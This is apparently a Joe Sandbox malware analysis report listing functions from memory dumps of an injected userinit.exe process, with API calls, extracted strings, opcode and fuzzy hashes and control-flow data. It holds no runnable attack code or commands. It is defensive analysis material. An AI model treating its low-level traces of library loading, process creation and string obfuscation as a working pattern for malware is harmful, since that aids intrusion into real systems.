                                                                • Opcode ID: 9eb77fb9506519ee716a6be9551ba768d930a6305ecb25ebbeec0b418dc20f2b
                                                                • Instruction ID: 42b9f981959a70b4c6259d15141d71655a0412c6f00002e5141b0830909a7d2b
                                                                • Opcode Fuzzy Hash: 9eb77fb9506519ee716a6be9551ba768d930a6305ecb25ebbeec0b418dc20f2b
                                                                • Instruction Fuzzy Hash: 0511A0B6D0125C7EEB11DBE48C80DEF7F7CAB91694F058054FA04AB240D5284E068BA1
                                                                Function 030109F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 567 30109f0-3010a02 568 3010a0a-3010a5a call 302bc60 call 30141d0 call 3001410 call 30218f0 567->568 569 3010a05 call 302b250 567->569 578 3010a7a-3010a80 568->578 579 3010a5c-3010a6b PostThreadMessageW 568->579 569->568 579->578 580 3010a6d-3010a77 579->580 580->578
                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 03010A67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
                                                                • Opcode ID: 931d75ecbf4df0deef89f2b105e44bbb8c64937d61a1d688ec7fee3cadcddb57
                                                                • Instruction ID: 0ff9a71c1e365762af6046a8a240c3b0421fca17fa0c75b03fe2dd4282840a17
                                                                • Opcode Fuzzy Hash: 931d75ecbf4df0deef89f2b105e44bbb8c64937d61a1d688ec7fee3cadcddb57
                                                                • Instruction Fuzzy Hash: 2A0196B5D0125C7EDB10E6E58C81DEFBB7CEF91694F458064FA04BB140D5385E068BB1
                                                                Function 0301F1C9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                                • Instruction ID: 5e4adafe0782f7a1d61eafa4b18d3560dbbf3e3932c470d98749633507407020
                                                                • Opcode Fuzzy Hash: 50885b1edb9e7b148e27d647e923dbd77f27874b4528f90006961c46233bcca0
                                                                • Instruction Fuzzy Hash: 513121B5A0060A9FDB00DFD8DC809EFB7B9FF88304B148559E515EB214D775EE458BA0
                                                                Function 0301F1D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                                • Instruction ID: 023c07061944f5442b7faf41969317dfd37b6f6eee45d5abaafcf0b89421679b
                                                                • Opcode Fuzzy Hash: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                                • Instruction Fuzzy Hash: D33110B5A0060A9FDB00DFD8D8809EFB7B9FF88304B148559E915EB214D775EE458BA0
                                                                Function 03023790 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 0302386B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: wininet.dll
                                                                • API String ID: 3472027048-3354682871
                                                                • Opcode ID: 4b45296fbfd4f5e4a1577e27a01ce22409fcfd32aa0328a2f5837752b9ad7849
                                                                • Instruction ID: e4f11117d43bca9296296513816b0de9b4dd70c352c933b994f2f0fdeb901793
                                                                • Opcode Fuzzy Hash: 4b45296fbfd4f5e4a1577e27a01ce22409fcfd32aa0328a2f5837752b9ad7849
                                                                • Instruction Fuzzy Hash: 13315CB5A02705BBD714DFA4CC84FEBBBB8AB88710F444559EA196B240D7746A408BA4
                                                                Function 03014250 Relevance: 1.7, APIs: 1, Instructions: 158libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014242
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction ID: efb160fed00f98aac2b2b647bfcd588d3343f5ca3613ee5e20467e39f01118d2
                                                                • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction Fuzzy Hash: FB419B31A06345ABDB10DFB9CC81FEABBB8DF46714F4806EAED448F152E6329415CB80
                                                                Function 030141D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014242
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction ID: ec2f7065af9488c366e0466ca8c36712fc9fd247b5bd9e0bcd8a84de919cf32e
                                                                • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction Fuzzy Hash: 01015EB9E0120DABDF10EAE5DC41FDEB7B8AB44208F044195E9089B240F630EB58CB91
                                                                Function 030294B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,8BF2C41C,?,03017FEE,00000010,?,?,?,00000044,?,00000010,03017FEE,?,8BF2C41C,?), ref: 03029513
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                                • Instruction ID: c881dab36bf64fb88ca1d2389205e575fefe5d99880bb5412b066b58a5ffb79b
                                                                • Opcode Fuzzy Hash: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                                • Instruction Fuzzy Hash: EA0180B6205608BBCB54DE99DC81EEB77ADAFCD754F418208BA19E7240D630FC518BA4
                                                                Function 03009AF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                                • Instruction ID: 6ad344e41cdee9311becae7cdc090dd62378944a6524bf06776134255a4189ed
                                                                • Opcode Fuzzy Hash: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                                • Instruction Fuzzy Hash: A2F0397739171436E220B5A99C02FEBB78C8B80A61F240429FA0CEA2C1D9A5B54182A4
                                                                Function 03009AEA Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009B35
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                                • Instruction ID: 323ef84dd616f9cc7dcb1a1a6c9f87c8e82b94b523171b9f579c32901e8c6005
                                                                • Opcode Fuzzy Hash: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                                • Instruction Fuzzy Hash: 02F030762817103BE224B5A98C52FE7B69D9F81B65F280018FA09AF1C1DAA5B54186A4
                                                                Function 03027FF0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03028030
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Path$NameName_
                                                                • String ID:
                                                                • API String ID: 3514427675-0
                                                                • Opcode ID: c90d3ea079158c21ab9e1e75dc3446daa8ef4141d83060cbdcedb459303117ec
                                                                • Instruction ID: e8a8375eec0597f26596be26dd669629e31e8ab2fe551990635ce1726fae7a19
                                                                • Opcode Fuzzy Hash: c90d3ea079158c21ab9e1e75dc3446daa8ef4141d83060cbdcedb459303117ec
                                                                • Instruction Fuzzy Hash: 66F030B52002047BD614EE59DC80EDB77ADDFC9710F408009FD1997241CA30BD158BF5
                                                                Function 030293D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(03011689,?,03025CBB,03011689,0302539F,03025CBB,?,03011689,0302539F,00001000,?,?,00000000), ref: 0302940C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction ID: 3979ee6e40c8086a7538f9f0fe0e2b2b426a577082f5af0f2535db03d3498273
                                                                • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction Fuzzy Hash: ADE039B6200214BBD614EA58DC84EDB77ACDFC9750F404008B909AB241DA30B81087B9
                                                                Function 03029420 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,03013A48,000000F4), ref: 0302945F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction ID: 62f03ef94c72cc2e03fc3282840071d06ab8a141f9da404acc17528353417574
                                                                • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction Fuzzy Hash: 66E06D752043047BD614EE98DC44FEB37ACDFC5710F404009FA09A7240D670BC1487B8
                                                                Function 03018030 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301805C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                                • Instruction ID: 1edf53e48b1a1cf5c665a6376887dc3469e4c336fd6a9cd175a722fdbc84a6b5
                                                                • Opcode Fuzzy Hash: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                                • Instruction Fuzzy Hash: 7EE080751513081FFB64E568DC45F7633985B48A24F7C4550B91CDB1C1F579FA214150
                                                                Function 0301802D Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301805C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                                • Instruction ID: 8d91b3866318a50c3ebede9ba9e8be29547fb2a705476454aa131deb40ae9b6c
                                                                • Opcode Fuzzy Hash: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                                • Instruction Fuzzy Hash: 22E026712113042FFB61A6788D867AE37685B44720F3C4A54F928AF0C3E97DE6324320
                                                                Function 03017E20 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011990,03027CDF,0302539F,03011956), ref: 03017E53
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                                • Instruction ID: 70e9faea079d7eb035d01a94f1678633670998b5ad5b36ef296905ed1666280a
                                                                • Opcode Fuzzy Hash: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                                • Instruction Fuzzy Hash: B2D02E792803083BF600F6A4CC12F6A32CC4B48A44F080024BA08EB2C2E914E1004260
                                                                Function 03772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                • Instruction ID: 7a1e8db8cf40dd9052365ecdc09a0ffd9a1fab3846d9258643a6c45e3c04c330
                                                                • Opcode Fuzzy Hash: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                • Instruction Fuzzy Hash: 22B02B719014C4C5EF00F3200608707390467D0300F19C471D3030241F0338C0C0E173

                                                                Non-executed Functions

                                                                Function 03A504DE Relevance: .1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                                • Instruction ID: 65bb7b17aa3d0506ce88439ebd0ae26d7332235988434cf26ce09ea1c99e4d29
                                                                • Opcode Fuzzy Hash: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                                • Instruction Fuzzy Hash: FE41E3B151DB094FD368EF6890816B6F3E2FB45300F54462EEDCAC3752EA74E8068785
                                                                Function 03A5DF66 Relevance: 57.7, Strings: 46, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3754132690
                                                                • Opcode ID: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                                • Instruction ID: 3282d4330e917ba6451f058f5e9faa787593e1a7b1d46a2416d4f934a59426e3
                                                                • Opcode Fuzzy Hash: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                                • Instruction Fuzzy Hash: A8914EF04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                Function 03A53C0F Relevance: 18.8, Strings: 15, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3907348573.0000000003A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3a50000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -/OB$3/67$7R[:$BNJN$HLUH$I@[5$JMUJ$KUJB$M[S0$NUK[$OJ[6$OUOU$THNU$TNHL$UHM
                                                                • API String ID: 0-3939393268
                                                                • Opcode ID: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                                • Instruction ID: 0dc03a641933d563042ddfd5dfeea4ac168badb54ebe9146a3580ba03754194d
                                                                • Opcode Fuzzy Hash: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                                • Instruction Fuzzy Hash: 893132B490424CEBCF25CF84D190ADEBFB2FF00344F828159E92A6F248C7768655CB98
                                                                Function 03772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                • Instruction ID: e480a961732b4b8cb3001394d4abb444067964e1a0326b1b36e0804f97dab589
                                                                • Opcode Fuzzy Hash: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                • Instruction Fuzzy Hash: DD51E8B5A04616BFDF10DB9C889097EF7B8BB49200B188669E4B5E7642D334DE40DBA0
                                                                Function 037E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                • Instruction ID: 83699eb163f8a4ef8972be4eb0eed5392ee479f92c6cadb598add282d1d11e0b
                                                                • Opcode Fuzzy Hash: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                • Instruction Fuzzy Hash: 6951EAB5A00655AEDB30EF5CC99097FB7FDEB48200B148899E4A6DB642D774EE40C760
                                                                Function 03767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 037A4787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 037A4725
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037A4655
                                                                • ExecuteOptions, xrefs: 037A46A0
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037A46FC
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037A4742
                                                                • Execute=1, xrefs: 037A4713
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: f943b6e58edb0edb6de8baf666e8885645c01d7588a8b47533165f795572f92a
                                                                • Instruction ID: 52fa20f1184d6cabc7c0fe26e937bfad1cf2fcc2db529c92f952adaca2c9ccb4
                                                                • Opcode Fuzzy Hash: f943b6e58edb0edb6de8baf666e8885645c01d7588a8b47533165f795572f92a
                                                                • Instruction Fuzzy Hash: B3512A75600359BADF24EAA9DC99FEE73B8EF44348F0401E9D905AB181E7719A418F50
                                                                Function 0377B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: 81aa4113055f6fd73611976f72a0beaa660521e2a9f1fc75f7fd9965e6d69fc9
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: CD81B074E052499EDF28CE68C8917FEBBB6AF85360F1C465ED861EB391C7349940CB90
                                                                Function 037E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                • Instruction ID: c77a6a8f46bdf1bda3bb73797f9e6630be9ddea1ad5cd2ef26b0b555191f1bdc
